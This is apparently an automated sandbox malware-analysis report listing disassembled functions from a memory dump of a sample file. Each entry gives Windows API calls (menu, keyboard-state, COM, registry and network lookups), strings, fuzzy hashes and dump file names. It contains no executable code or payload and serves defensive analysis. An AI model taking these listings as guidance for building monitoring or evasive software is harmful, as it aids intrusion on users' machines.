              • Instruction ID: 27e4f905523b60d9cbf76744ee12655f1e81a7552025290023e5ab70472d24f8
              • Opcode Fuzzy Hash: 774ab2aae67258239831e92e67dcaaa716ba94ab6126bff1be4a99a25270d1c8
              • Instruction Fuzzy Hash: 730289341083419FC724EF24C881AAFBBE5EFA9354F14492DF496972A2DB30DA49CF52
              Function 001845DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 001845F9
              • GetMenuItemCount.USER32(00246890), ref: 001BD7CD
              • GetMenuItemCount.USER32(00246890), ref: 001BD87D
              • GetCursorPos.USER32(?), ref: 001BD8C1
              • SetForegroundWindow.USER32(00000000), ref: 001BD8CA
              • TrackPopupMenuEx.USER32(00246890,00000000,?,00000000,00000000,00000000), ref: 001BD8DD
              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001BD8E9
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
              • String ID:
              • API String ID: 2751501086-0
              • Opcode ID: d4e9a89909cdf6da9c9063a6958bb2d2c9ee6de0e07814314c2f0c2e09527061
              • Instruction ID: ad0ee96cc5e3186d8315af08e825ed8fb4e8ac3b50e9db86a308e733e1d77feb
              • Opcode Fuzzy Hash: d4e9a89909cdf6da9c9063a6958bb2d2c9ee6de0e07814314c2f0c2e09527061
              • Instruction Fuzzy Hash: 2C71D570640216BFEB389F55EC49FEABF69FF05368F200216F514A61E1DBB15850DB90
              Function 001F8BC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
              Download Yara Rule
              APIs
              • VariantInit.OLEAUT32(?), ref: 001F8BEC
              • CoInitialize.OLE32(00000000), ref: 001F8C19
              • CoUninitialize.OLE32 ref: 001F8C23
              • GetRunningObjectTable.OLE32(00000000,?), ref: 001F8D23
              • SetErrorMode.KERNEL32(00000001,00000029), ref: 001F8E50
              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00212C0C), ref: 001F8E84
              • CoGetObject.OLE32(?,00000000,00212C0C,?), ref: 001F8EA7
              • SetErrorMode.KERNEL32(00000000), ref: 001F8EBA
              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001F8F3A
              • VariantClear.OLEAUT32(?), ref: 001F8F4A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
              • String ID: ,,!
              • API String ID: 2395222682-3142458726
              • Opcode ID: 5b2fb64f140ba9a142d8bcf8231c01886ed28d8b57309a3af2f3b08f8ec8a121
              • Instruction ID: b8576db05443b306e20794246d86df267064c8ebb0239619cfc721dd6a5eeb9f
              • Opcode Fuzzy Hash: 5b2fb64f140ba9a142d8bcf8231c01886ed28d8b57309a3af2f3b08f8ec8a121
              • Instruction Fuzzy Hash: 42C12471208309AFD700EF64C88496BB7E9FF89748F04496DF68A9B251DB71ED05CB52
              Function 002010A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
              Download Yara Rule
              APIs
              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00200038,?,?), ref: 002010BC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BuffCharUpper
              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
              • API String ID: 3964851224-909552448
              • Opcode ID: 7d48513880851665cb4f23079ac2e862e02d6d159dd0edb17c0c0c503d1b3883
              • Instruction ID: 3d62e07922a18dd680d76d38dffefbf646fd327409b5a3c529c0c501e8663d6b
              • Opcode Fuzzy Hash: 7d48513880851665cb4f23079ac2e862e02d6d159dd0edb17c0c0c503d1b3883
              • Instruction Fuzzy Hash: 2D4182B512034E8BCF15EF90DD91AEA3725BF2A310F104414FD955B292D770AD3ACB50
              Function 001E5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
                • Part of subcall function 00187A84: _memmove.LIBCMT ref: 00187B0D
              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001E55D2
              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001E55E8
              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001E55F9
              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 001E560B
              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 001E561C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: SendString$_memmove
              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
              • API String ID: 2279737902-1007645807
              • Opcode ID: 9534c8635ffc6e44b29b5a823d4cc183f5c39033f2b9d8ff7fbbba9b5992ad04
              • Instruction ID: c5d88939966c704fb60660335b9cba588514002b44fc86c6459c405a02e91bfc
              • Opcode Fuzzy Hash: 9534c8635ffc6e44b29b5a823d4cc183f5c39033f2b9d8ff7fbbba9b5992ad04
              • Instruction Fuzzy Hash: 0311046056016979D720B662CC8ACFFBB7CEFA6F00F400469B405A30D1DF604E05CAB1
              Function 001E48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
              • String ID: 0.0.0.0
              • API String ID: 208665112-3771769585
              • Opcode ID: 48ebbfe2e9522ef884b71418b00fe2bad501ea0a9cf3baec103d09ded966f4ee
              • Instruction ID: 68f11e5a15ac939a6c5cb264161ce242a98dbe452b6710928ccecb752bfe6f8d
              • Opcode Fuzzy Hash: 48ebbfe2e9522ef884b71418b00fe2bad501ea0a9cf3baec103d09ded966f4ee
              • Instruction Fuzzy Hash: 56112435904214AFCB34EB25ED0AEDF77BCEF56714F0001B6F405A60A3EFB09A8186A1
              Function 001E5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
              Download Yara Rule
              APIs
              • timeGetTime.WINMM ref: 001E521C
                • Part of subcall function 001A0719: timeGetTime.WINMM(?,75A8B400,00190FF9), ref: 001A071D
              • Sleep.KERNEL32(0000000A), ref: 001E5248
              • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 001E526C
              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 001E528E
              • SetActiveWindow.USER32 ref: 001E52AD
              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001E52BB
              • SendMessageW.USER32(00000010,00000000,00000000), ref: 001E52DA
              • Sleep.KERNEL32(000000FA), ref: 001E52E5
              • IsWindow.USER32 ref: 001E52F1
              • EndDialog.USER32(00000000), ref: 001E5302
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
              • String ID: BUTTON
              • API String ID: 1194449130-3405671355
              • Opcode ID: d12a17601a1c50822d6c5b2900626aebf1ea893e4b0cfa10867154be98fb3ecf
              • Instruction ID: c6bdc794f98058ef2d87826fc0f2b3092f98a5dace90a72c390fffa60013edfb
              • Opcode Fuzzy Hash: d12a17601a1c50822d6c5b2900626aebf1ea893e4b0cfa10867154be98fb3ecf
              • Instruction Fuzzy Hash: 7021C374244B45AFE7125F71FE8CB2E3B6AFB5634AF400434F911865B2CBB19C508BA2
              Function 001ED7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
              • CoInitialize.OLE32(00000000), ref: 001ED855
              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001ED8E8
              • SHGetDesktopFolder.SHELL32(?), ref: 001ED8FC
              • CoCreateInstance.OLE32(00212D7C,00000000,00000001,0023A89C,?), ref: 001ED948
              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001ED9B7
              • CoTaskMemFree.OLE32(?,?), ref: 001EDA0F
              • _memset.LIBCMT ref: 001EDA4C
              • SHBrowseForFolderW.SHELL32(?), ref: 001EDA88
              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001EDAAB
              • CoTaskMemFree.OLE32(00000000), ref: 001EDAB2
              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 001EDAE9
              • CoUninitialize.OLE32(00000001,00000000), ref: 001EDAEB
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
              • String ID:
              • API String ID: 1246142700-0
              • Opcode ID: 97b033dc201cc5d17ebe05dc1911a0dccbd36e913f88638c9530aae33b0e7ef1
              • Instruction ID: b0df68d2932add91c201430c40f0bcbf6f9212a1b487fb215dcae4f973ef435e
              • Opcode Fuzzy Hash: 97b033dc201cc5d17ebe05dc1911a0dccbd36e913f88638c9530aae33b0e7ef1
              • Instruction Fuzzy Hash: 37B10D75A00609AFDB14DFA5D888DAEBBF9FF48304B148469F905EB251DB30EE41CB50
              Function 001E052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
              Download Yara Rule
              APIs
              • GetKeyboardState.USER32(?), ref: 001E05A7
              • SetKeyboardState.USER32(?), ref: 001E0612
              • GetAsyncKeyState.USER32(000000A0), ref: 001E0632
              • GetKeyState.USER32(000000A0), ref: 001E0649
              • GetAsyncKeyState.USER32(000000A1), ref: 001E0678
              • GetKeyState.USER32(000000A1), ref: 001E0689
              • GetAsyncKeyState.USER32(00000011), ref: 001E06B5
              • GetKeyState.USER32(00000011), ref: 001E06C3
              • GetAsyncKeyState.USER32(00000012), ref: 001E06EC
              • GetKeyState.USER32(00000012), ref: 001E06FA
              • GetAsyncKeyState.USER32(0000005B), ref: 001E0723
              • GetKeyState.USER32(0000005B), ref: 001E0731
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: State$Async$Keyboard
              • String ID:
              • API String ID: 541375521-0
              • Opcode ID: 6919fc615a4c4dd575d3507144245b6f22fd9cef6ee01640ae2b2f5bbd3b86f0
              • Instruction ID: c6e283d840ef667dd1bb9173e6b62fe708218e929fc63f89ddb73da338c1fd0e
              • Opcode Fuzzy Hash: 6919fc615a4c4dd575d3507144245b6f22fd9cef6ee01640ae2b2f5bbd3b86f0
              • Instruction Fuzzy Hash: B351B970A04BC829FB36DBB188557EEBFB49F19380F084599D5C2561C2DBA49BCCCB61
              Function 001DC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
              Download Yara Rule
              APIs
              • GetDlgItem.USER32(?,00000001), ref: 001DC746
              • GetWindowRect.USER32(00000000,?), ref: 001DC758
              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 001DC7B6
              • GetDlgItem.USER32(?,00000002), ref: 001DC7C1
              • GetWindowRect.USER32(00000000,?), ref: 001DC7D3
              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 001DC827
              • GetDlgItem.USER32(?,000003E9), ref: 001DC835
              • GetWindowRect.USER32(00000000,?), ref: 001DC846
              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 001DC889
              • GetDlgItem.USER32(?,000003EA), ref: 001DC897
              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 001DC8B4
              • InvalidateRect.USER32(?,00000000,00000001), ref: 001DC8C1
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$ItemMoveRect$Invalidate
              • String ID:
              • API String ID: 3096461208-0
              • Opcode ID: fb8af73268490a7aab4a9c6bd832b293043d8017f0d4b255bc2f8d22cdd1bce2
              • Instruction ID: 8095fa547899a9cbc04bb5409896e75b83328b413e4c57d5f244c6bcb2d5e236
              • Opcode Fuzzy Hash: fb8af73268490a7aab4a9c6bd832b293043d8017f0d4b255bc2f8d22cdd1bce2
              • Instruction Fuzzy Hash: 21513E71B40205ABDB18CFA9DD89AAEBBBAFB88310F14852DF515D76A1D7709D00CB50
              Function 0018201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00181B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00182036,?,00000000,?,?,?,?,001816CB,00000000,?), ref: 00181B9A
              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 001820D3
              • KillTimer.USER32(-00000001,?,?,?,?,001816CB,00000000,?,?,00181AE2,?,?), ref: 0018216E
              • DestroyAcceleratorTable.USER32(00000000), ref: 001BBEF6
              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001816CB,00000000,?,?,00181AE2,?,?), ref: 001BBF27
              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001816CB,00000000,?,?,00181AE2,?,?), ref: 001BBF3E
              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001816CB,00000000,?,?,00181AE2,?,?), ref: 001BBF5A
              • DeleteObject.GDI32(00000000), ref: 001BBF6C
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
              • String ID:
              • API String ID: 641708696-0
              • Opcode ID: 0a4b020794ef84cd83931eb387fe37cd9fde8739c60e65e7d061029f9017836b
              • Instruction ID: 52b19b0259955200c68dcc6c43b1dc55bdfca9ec9bb0364e25aa0c681e43202a
              • Opcode Fuzzy Hash: 0a4b020794ef84cd83931eb387fe37cd9fde8739c60e65e7d061029f9017836b
              • Instruction Fuzzy Hash: 1F61AD35104710DFDB3AAF14ED8CB69B7F1FB52316F10852CE0429A9A0C7B5A981DF52
              Function 001821A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001825DB: GetWindowLongW.USER32(?,000000EB), ref: 001825EC
              • GetSysColor.USER32(0000000F), ref: 001821D3
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ColorLongWindow
              • String ID:
              • API String ID: 259745315-0
              • Opcode ID: 7fca9bb065d4b2439a7ffbd6d646d0d95446f299d641d7a60ebd85b6b184176d
              • Instruction ID: 5098d0b9922f26f33851fd1d1ff4ba54e5cbe199f2501b9bed85b44463002988
              • Opcode Fuzzy Hash: 7fca9bb065d4b2439a7ffbd6d646d0d95446f299d641d7a60ebd85b6b184176d
              • Instruction Fuzzy Hash: CA418331140240EFDB266F28EC8CBB97B66EB46331F144265FD659A1E2C7318D42DB51
              Function 001EAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
              Download Yara Rule
              APIs
              • CharLowerBuffW.USER32(?,?,0020F910), ref: 001EAB76
              • GetDriveTypeW.KERNEL32(00000061,0023A620,00000061), ref: 001EAC40
              • _wcscpy.LIBCMT ref: 001EAC6A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BuffCharDriveLowerType_wcscpy
              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
              • API String ID: 2820617543-1000479233
              • Opcode ID: 48974fe1455255ef6e3a54369547f81ea0b1c5293e9ceddf3c1c404996bb7f9a
              • Instruction ID: e35e740835879551bf3f0baed9972e9fb09bdcca6cc94361ec14cd1cb8975b76
              • Opcode Fuzzy Hash: 48974fe1455255ef6e3a54369547f81ea0b1c5293e9ceddf3c1c404996bb7f9a
              • Instruction Fuzzy Hash: 8F51FB711183419BC714EF15C8C2AAEB7A9FFA5300F94482DF496972A2DB31EE49CB53
              Function 0020C27C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
                • Part of subcall function 00182344: GetCursorPos.USER32(?), ref: 00182357
                • Part of subcall function 00182344: ScreenToClient.USER32(002467B0,?), ref: 00182374
                • Part of subcall function 00182344: GetAsyncKeyState.USER32(00000001), ref: 00182399
                • Part of subcall function 00182344: GetAsyncKeyState.USER32(00000002), ref: 001823A7
              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0020C2E4
              • ImageList_EndDrag.COMCTL32 ref: 0020C2EA
              • ReleaseCapture.USER32 ref: 0020C2F0
              • SetWindowTextW.USER32(?,00000000), ref: 0020C39A
              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0020C3AD
              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0020C48F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
              • String ID: @GUI_DRAGFILE$@GUI_DROPID$pr$$pr$
              • API String ID: 1924731296-3322075626
              • Opcode ID: 3f2a6681ac5a0841439994fc922084a5477cc28df7d6c286cca930e60701ff99
              • Instruction ID: 6bcf3402f53b88fa36c7dcd69c6fed5d1a78eee82bbd28c02fd2b751825e3658
              • Opcode Fuzzy Hash: 3f2a6681ac5a0841439994fc922084a5477cc28df7d6c286cca930e60701ff99
              • Instruction Fuzzy Hash: 0A51BC74204301AFC714EF20D899F6A7BE5FB99710F10462DF9918B2E2CB70A958CF52
              Function 00189997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __i64tow__itow__swprintf
              • String ID: %.15g$0x%p$False$True
              • API String ID: 421087845-2263619337
              • Opcode ID: ef6024e73a74a5f327af3913cfe3c55212aa02fe5f043cb8bf4a18e50db75e7b
              • Instruction ID: 00de93f73bbed1fe218f6a6058b9eb8995161e1372fde6e36e06adad0536bc52
              • Opcode Fuzzy Hash: ef6024e73a74a5f327af3913cfe3c55212aa02fe5f043cb8bf4a18e50db75e7b
              • Instruction Fuzzy Hash: 8841E575A04205AFDB28EF38DC42F7AB3E8EB45318F24446EF549D7291EB719A42CB11
              Function 002073C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 002073D9
              • CreateMenu.USER32 ref: 002073F4
              • SetMenu.USER32(?,00000000), ref: 00207403
              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00207490
              • IsMenu.USER32(?), ref: 002074A6
              • CreatePopupMenu.USER32 ref: 002074B0
              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002074DD
              • DrawMenuBar.USER32 ref: 002074E5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
